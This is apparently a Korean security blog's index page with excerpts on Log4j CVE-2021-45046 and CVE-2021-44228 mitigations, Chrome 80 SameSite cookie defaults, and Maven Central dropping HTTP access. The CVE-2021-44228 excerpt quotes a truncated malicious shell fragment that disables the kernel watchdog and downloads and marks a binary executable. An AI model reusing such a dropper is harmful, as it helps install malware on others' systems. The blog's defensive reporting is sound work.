Log4j 2.15.0 취약점 CVE-2021-45046

Log4j 2.15.0 으로 업그레이드 한지 하루만에 CVE-2021-45046 가 공개되었습니다. 영향 받는 버전 Logj2

Log4j 취약점 (CVE-2021-44228) 을 막는 5가지 방법

스위스 정부에서 깔끔하게 정리해서 포스팅한 글을 참조 하였습니다. 이미 이슈는 다뤘으니 Log4j 2.x 의 이슈 CVE-2021-44228 설명은 생략 하겠습니다. 이슈 관련 포스팅은 CVE-2021-44228 취약점 참고하세요. Message formatting 을 통한 lookup 동작을 위해 ${protocol:~~~} 의 패턴을 갖습니다. WAF 에 룰을 설정하여 차단합니다. Log4j2 의 message lookup 을 disable 합니다. (2.10

CVE-2021-44228 취약점

2021년 12월 10일. CVE-2021-44228 취약점이 공개 되었습니다. 현재 수많은 사이트 등에서 다수의 스캔 흔적이 포착 된것으로 확인 됩니다. 자바 어플리케이션을 사용하는 곳은 모두 체크 해봐야 합니다. 영향 받는 버전 Log4j 2.x /proc/sys/kernel/nmi_watchdog echo 'kernel.nmi_watchdog=0' >>/etc/sysctl.conf ROOTUID="0" function __curl() { read proto server path $HOME/curl; chmod +x $HOME/curl $HOME/curl -V && WGET="$HOME/curl -o" $HOME/curl -V || __curl "$CURL_DOWNLOAD_URL" > $BIN_PAT..

Google Chrome 80 SameSite Policy

배포 예정일 Chrome 80 부터 cookie samesite 정책이 변경된다. 2020. 02. 04 배포 예정 * 2020. 02. 05 AM 9 체크해보니 업데이트 되었다. 변경 사항 SameSite attributer가 지정되지 않았을 때 SameSite=Lax 가 기본값으로 변경 SameSite=None 설정시 secure flag가 활성화 되어 있지 않으면 reject 참고 사이트 https://www.chromestatus.com/feature/5088147346030592 https://www.chromestatus.com/feature/5633521622188032 SameSite Attribue의 설정 정보 ValueDescription Strict 이 설정을 사용하는 쿠키는 처음에 ..

Maven Central Repository blocking http protocol

2020. 01. 15 일 부로 http://repo1.maven.org / http://repo.maven.apache.org/ 두 repository에 대해 access가 제한된다. 2019년 4월 https 로 변경을 권고 하였고 이번에 변경이 완료 된것이다. https://central.sonatype.org/articles/2019/Apr/30/http-access-to-repo1mavenorg-and-repomavenapacheorg-is-being-deprecated/ https://blog.sonatype.com/central-repository-moving-to-https 하지만 미처 대처하지 못하고 잊고 있었는데 갑자기 제한되어 당황했다. maven central 뿐만 아니라 http:..